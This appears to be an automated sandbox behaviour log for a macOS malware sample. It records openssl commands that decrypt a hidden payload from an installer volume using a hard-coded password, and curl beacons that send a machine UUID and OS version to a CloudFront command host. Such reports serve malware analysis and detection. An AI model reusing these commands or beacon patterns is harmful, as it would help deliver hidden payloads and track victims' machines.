Source: /bin/bash (PID: 18843) | Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ |
Source: /bin/bash (PID: 18849) | Openssl executable with 'enc' command: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2 |
Source: /bin/bash (PID: 18843) | Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -pass pass:2P1zsqQ |
Source: /bin/bash (PID: 18849) | Openssl executable: /usr/bin/openssl -> openssl enc -aes-256-cbc -d -A -base64 -k 2P1zsqQ -in /Volumes/Install/.hidden/2P1zsqQ -out /tmp/oVlTmrVXYMfG/Qqsz1P2 |
Source: global traffic | HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */* |
Source: global traffic | HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */* |
Source: global traffic | HTTP traffic detected: GET /sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1 HTTP/1.0 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */* |
Source: global traffic | HTTP traffic detected: GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: */* |
Source: unknown | DNS traffic detected: queries for: d1wkiebwu8q7qk.cloudfront.net |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1245 Connection: close Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Thu, 14 May 2020 09:21:12 GMT X-Cache: Error from cloudfront Via: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: QTqhiTeBI0MnpH6TE-ieuK0urxyObER7GaCgBzr4TxQ9ixi25rXZbg== |